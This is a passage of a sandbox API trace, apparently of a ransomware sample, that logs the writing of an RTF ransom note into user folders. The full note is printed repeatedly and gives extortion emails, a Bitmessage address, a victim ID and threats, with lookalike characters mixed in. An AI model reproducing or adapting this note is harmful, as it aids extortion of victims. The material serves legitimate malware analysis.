24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.550] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.550] CloseHandle (hObject=0x2c8) returned 1 [0278.551] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\#readme_eman#.rtf")) returned 0xffffffff [0278.551] GetLastError () returned 0x2 [0278.551] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_br\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 